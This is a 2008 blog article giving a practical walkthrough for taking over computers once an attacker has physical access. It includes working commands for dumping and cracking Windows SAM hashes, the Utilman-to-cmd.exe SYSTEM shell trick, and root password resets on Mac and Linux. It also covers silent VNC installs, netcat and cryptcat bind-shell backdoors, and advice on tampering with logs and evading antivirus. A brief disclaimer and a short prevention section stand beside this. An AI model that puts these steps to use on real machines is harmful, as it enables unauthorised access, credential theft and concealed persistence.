Physical Access is Total Access

July 12th, 2008 by Dev Team in News

by LysergicBliss
A cardinal rule of computer security is that once an attacker has
acquired physical access to a machine, it is generally trivial for
that attacker to fully compromise the system. As technology
improves, this is becoming less the case, but for now, if an attacker
has physical access to a machine, the attacker can generally breach
its security.

Table of Contents

Part 1: Gaining Access
-Windows Option 1: Cracking the Password
-Windows Option 2: Circumventing the Password
-Windows Option 3: Utilman privilege escalation exploit
-MacOSX: Single User Mode
-Linux: /etc/passwd and /etc/shadow

Part 2: Exploiting the System
-Harvesting Information
-Backdoors and Rootkits

Part 3: Conclusion
-Cleaning Up Your Tracks
-How to Prevent These Attacks
-Tools/Reading Material


This article is intended as a basic overview of techniques to
compromise computers given physical access. Most of this information
is already easily available online, but I thought putting it all in
one place and explaining the techniques and tools in a concise way
would be a worthwhile endeavor. The text of this article is entirely
my own. Hopefully, this could serve as an introduction for someone
who is just starting out and might give some ideas about where to go
next. This is not intended to be an in-depth guide to any of the
specific techniques or tools mentioned in the article, but hopefully
I’ve included enough explanation for basic understanding of what’s
going on. This article may be re-published without permission,
provided my name remains on it. As computer security is a rapidly
changing field, the contents of this article are relevant today
(7/12/2008), but may be out of date in the near future. However, the
general principles of these attacks will most likely remain the same.

This article is intended for educational use only. The attacks
included should only be attempted with permission from the owner of
the target system. Gaining unauthorized access to a computer system
is a felony, and I am not responsible for any damage caused by the
use of these techniques.

Part 1: Gaining Access


A LiveCD is a complete (sometimes extremely minimal) operating system
that can be run straight from a CD (or a USB drive). Simply pop in
the CD before booting, turn on the computer, tell it to boot from CD
(on my machine, you can bring up a boot menu by pressing F12), and

My LiveCD of choice is BackTrack (
It is a LiveCD designed for security and penetration testing, so it
comes bundled with dozens of powerful programs that every security
expert should have.

The LiveCD can be invaluable in bypassing operating system security
because it generally allows a user to access the partitions of the
harddrive without actually running the native operating system. What
this means is that if you just want access to the files on a machine,
you can stop reading here: just boot to a LiveCD, navigate to the
proper partition, and enjoy full file access. However, actually
gaining access to the programs, services, and information stored on a
computer may be more complicated, and is dependent on the operating
system. I will briefly cover basic tactics for gaining administrative access
to Windows, MacOS, and many versions of Linux.

Windows Option 1: Cracking the Password

On most Windows operating systems, user information and passwords are
stored in what is called a SAM file. This file is typically stored
in “WINDOWS/System32/config/SAM”, but is not accessible when
Windows is running. The file itself is encrypted with a key stored
in “WINDOWS/System32/config/system”, which is also not accessible
when Windows is running. However, by booting to a LiveCD, these
files can be accessed, and with the proper tools, decryption of the
SAM file and decryption of the passwords stored within is possible.

For this example, I booted the target Windows machine using BackTrack
3. First, I opened up a terminal and navigated to the directory
containing the SAM and system key, and then copied them to a temp
directory. Then, I navigated to the temp directory and decrypted the
SAM file using the bkhive and samdump2 tools, both of which are
included in BackTrack. The harddrive in this instance was mounted as
“hda2”, but this may vary.

# cd /mnt/hda2/WINDOWS/System32/config
# cp SAM /tmp
# cp system /tmp
# cd /tmp
# bkhive system key
# samdump2 SAM key > /tmp/passwords.txt

This results in the decrypted SAM file being stored as a text file
called “passwords.txt”. Now, the passwords in this file must be
decrypted to plaintext if they are to be usable. On Windows
operating systems prior to Vista, the passwords in the SAM file are
encrypted using a notoriously insecure hashing algorithm called LM
(LanManager). On Vista, the SAM file is encrypted using the more
secure NTLM algorithm.

There are typically three approaches to decrypting these passwords:
rainbow tables, wordlists, and brute-force. The detailed specifics
of these approaches are beyond the scope of this article, but I will
give a brief explanation on these methods.

Rainbow tables use an algorithm based on chains of one-way hash
functions to leverage increased pre-computing time to allow for fast password
cracking. Rainbow tables are specially generated for a specific type of hash
(MD5, LM, etc.), and can take anywhere from minutes to years
to generate, but once they have been generated, they can be a powerful
tool to quickly decrypt passwords. Included in BackTrack is
RainbowCrack (,
the standard tool for generating and utilizing rainbow tables for decryption.
Pre-generated rainbow tables can be found – I recommend FreeRainbowTables
( and the Shmoo Group
( for tables.

Sample usage of rtgen for generating rainbow tables of LM hashes (this may take several hours):

# rtgen lm alpha 1 7 0 2100 8000000 all
# rtgen lm alpha 1 7 1 2100 8000000 all
# rtgen lm alpha 1 7 2 2100 8000000 all
# rtgen lm alpha 1 7 3 2100 8000000 all
# rtgen lm alpha 1 7 4 2100 8000000 all

Sample usage of RainbowCrack for using these rainbow tables to
decrypt our SAM passwords:

First sort the tables:
# rtsort lm_alpha#1-7_0_2100x8000000_all.rt
# rtsort lm_alpha#1-7_1_2100x8000000_all.rt
# rtsort lm_alpha#1-7_2_2100x8000000_all.rt
# rtsort lm_alpha#1-7_3_2100x8000000_all.rt
# rtsort lm_alpha#1-7_4_2100x8000000_all.rt

Next, crack the hashes:
# rcrack *.rt -f passwords.txt

If rainbow tables are not an option due to space constraints (the tables
themselves can be enormous) or other reasons, my next preferred
method is using a wordlist. Wordlists are readily available online
and can allow for a dictionary attack: checking the hashes of every
entry in the wordlist against the hashed password and looking for a
match, which would yield the plaintext password. Wordlists vary from
a simple lower-case dictionary to larger, more comprehensive
combinations of uppercase, lowercase, numbers, and symbols. Using
wordlists is a tradeoff – the larger the wordlist, the higher the
chance of cracking the password, but the longer the cracking will
take. My tool of choice for cracking passwords using wordlists is
John the Ripper (, also included in BackTrack.

Sample usage of John the Ripper with a wordlist:
# john -w=[wordlist] -f=NT passwords.txt

If neither wordlists nor rainbow tables are an option, the last
resort is a brute-force attack. Brute-forcing is trying literally
every possible combination of letters, numbers, and symbols.
Obviously, this technique is time-consuming, and sometimes
prohibitively so. Often it would take years to brute-force a
reasonably long, strong password. But for shorter passwords, this
may be an option. Again, I prefer to use John the Ripper.

Sample usage of John the Ripper using brute-force:
# john –incremental:all -f=NT passwords.txt

Windows Option 2: Circumventing the Password

Sometimes, an attacker only desires access to the system but does not
need the knowledge of the owner’s password. It is possible to
completely circumvent the Windows login password by wiping out the
password rather than cracking it. This is usually a much faster,
easier process.

In this attack, I typically boot the target Windows machine using
BackTrack. Then, I navigate to the the “WINDOWS/System32/config”
folder and make a backup of the user’s SAM and system files. This is
for the purposes of covering my tracks and restoring the original
passwords later. If an attacker were not concerned about stealth,
then this step would be unnecessary. I backup the files to a USB
drive that mounts as “sda1”. This may vary on your system.

# cd /mnt/hda2/WINDOWS/System32/config
# cp SAM /mnt/sda1/
# cp system /mnt/sda1/

Next, I reboot and boot to another of my favorite LiveCDs: the NT Password
and Registry Editor (
By navigating through the menus and following the instructions, it
is trivial to reset a chosen user’s password or promote an existing
user to Administrator privileges.

When I am done using the system as an Administrator, I make sure to
restore the user’s original SAM and system file, so there is no
evidence of a password change.

Windows Option 3: Utilman privilege escalation exploit

Many Windows operating systems allow the running of a service called
Utility Manager prior to actually logging in as a user. This program
is executed with System privileges (a special level higher than
Administrator), so with a LiveCD, it is possible to trick Windows
into executing an arbitrary program with System privileges prior to
logging in. In this example, I’ll get a root shell by tricking
Windows into executing cmd.exe instead of utilman.exe.

I boot up the target Windows machine with BackTrack, and navigate to
“WINDOWS/System32”. Then I simply backup utilman.exe, and copy
cmd.exe on top of utilman.exe.

# cd /mnt/hda2/Windows/System32/
# mv Utilman.exe Utilman.backup
# cp cmd.exe Utilman.exe
# reboot

Then, simply boot the system to Windows, and press Windows + U to
open up a command prompt with System privileges. (Note: this method
of exploitation may soon be patched.)

MacOSX: Single User Mode

To boot a Mac into “Single User mode”, simply boot the computer
and press Apple + S when blue first shows up on the screen. Next,
mount the harddrive, and either dump the password and crack it with a
tool like John the Ripper, or simply overwrite the root password:

# /sbin/mount -wu /
# /sbin/SystemStarter

To dump the existing root password:
# nidump passwd

To create a new root password:
# passwd root

Linux: /etc/passwd and /etc/shadow

On most Linux operating systems, password information is stored at
/etc/passwd. A sample entry might look like:


This is the information for the root user account. The “x”
indicates that the password is encrypted and stored in /etc/shadow.
The corresponding shadow entry might look like:


This entry contains information on permissions for this user as well
as a hashed password. However, depending on the distribution, Linux
operating systems typically use much more secure hashing functions
including salt values, so decrypting these passwords is not typically

Instead, an attacker can reset the password by simply running
BackTrack and checking the /etc/passwd file. If there is an “x”
in the password spot, open the /etc/shadow file and delete the
password hash between the colons. If the hash is in the /etc/passwd
file, simply delete the hash in that file. Then, reboot and login as
root with no password.

Part 2: Exploiting the System

Harvesting Information

Once an attacker has gained access to a machine, he or she is now
able to begin harvesting information from the system. Most operating
systems have features to store passwords for wireless settings, and
many web browsers will store passwords and reveal them if prompted.
In addition, tools such as keyloggers may be installed to provide
continued information theft after the attacker has left.

There are many tools that are helpful in automatically dumping
private information from a system. On Windows, my favorite is a USB
application called the “USB Switchblade”. I prefer GonZor’s
version ( This tool can be used to stealthily
dump information on a system that you have access to, but I use it
for all my information gathering needs. It supports the ability to dump
Windows passwords, browser passwords, wireless passwords, and much
more. In addition, it allows you to silently install the VNC remote desktop
tool, which will open up a port (usually 5800) that can be accessed in a
browser for complete remote control. This segues nicely into the next

Leaving the Door Open

In addition to stealing information from the user, many attackers
prefer to set up some sort of backdoor to allow future access to the
system remotely. My personal favorite is NetCat (,
which has been called the “Swiss army knife of network tools”.
NetCat is a simple utility that can open ports on a machine for
listening for remote connections, and bind those ports to programs.
For example, on a Windows machine I might run the following command
(in the directory that contains my NetCat executable):

nc -l -p[port] -d -e cmd.exe -L

This opens a port on [port] for listening for a remote connection,
and when a connection is made, it binds cmd.exe to the input and
output of that connection, allowing a remote user to execute
commands. Because using NetCat in such a manner leaves an open
door that any attacker could take advantage of, I prefer to use a
modification of NetCat called CryptCat (,
which allows for password protection and encrypted channels using a
“-k” parameter to set the password:

cryptcat -l -p[port] -k[password] -d -e cmd.exe -L

Then, on my remote machine, I connect to the open port to gain

cryptcat [target IP] [port] -k [password]

These tools are available cross-platform, increasing their
versatility. However, there are dozens of rootkits and backdoors
available for free use. Most are easily detectable by anti-virus
software, so I recommend coding your own backdoors or learning how to
camouflage software to evade anti-virus detection.


Cleaning Up Your Tracks

One of the more difficult tasks for any attacker is leaving behind no
evidence of the infiltration. In general, it is common practice to
backup any files related to passwords before modifying them, and to
restore these files after the attack is finished. Installing a
backdoor is probably the most difficult challenge for the attacker,
because it involves leaving many clues behind. If a user detects
that a backdoor exists, then it will be quickly closed. Popular
techniques to ensure successful backdoors include piggy-backing on
existing network applications (to use an already open port),
masquerading the process as a system service and hiding the execution
of the process from utilities such as the task manager, and
installing the backdoor to execute on startup. These topics are
highly operating system dependent and go beyond the scope of this
article. Finally, many operating systems keep logs of when users
access the system and run programs, so these logs should be located
and modified from LiveCD at the conclusion of an attack.

How to Prevent These Attacks

There are a number of simple steps a user can take to mitigate the
risk of attacks via physical access. Obviously, the first and most
important of these is to not allow physical access to a system by an
attacker. The cardinal rule that physical access equals total access
exists for a reason.

However, there are additional security measures that can be taken.
Harddrive encryption is an emergent technology that prevents the
mounting and reading of material without proper authentication.
There are advanced methods of circumventing disk encryption, but this
preventative measure will prevent almost all attacks of this kind.
Also, it is good practice to enable a BIOS or firmware password on
your system. This will prevent booting to a LiveCD or running other
malicious software on a system. Password strength is also very
important: strong passwords contain lowercase letters, uppercase
letters, numbers, and symbols, and are at least 8 characters long.
Having strong passwords seriously mitigates the risk of having the
password cracked via wordlist or rainbow tables, and makes the use of
brute-force infeasible. Finally, in Windows, make sure to disable
the LM hashing protocol if possible, in favor of the more secure NTLM


Thank you for taking the time to read this article. I hope it will
be useful to someone.

Tools/Reading Material

BackTrack 3 –
CryptCat –
Free Rainbow Tables –
John the Ripper –
NetCat –
NT Password and Registry Editor –
RainbowCrack –
Shmoo Group Rainbow Tables –
USB Switchblade –

Leave a reply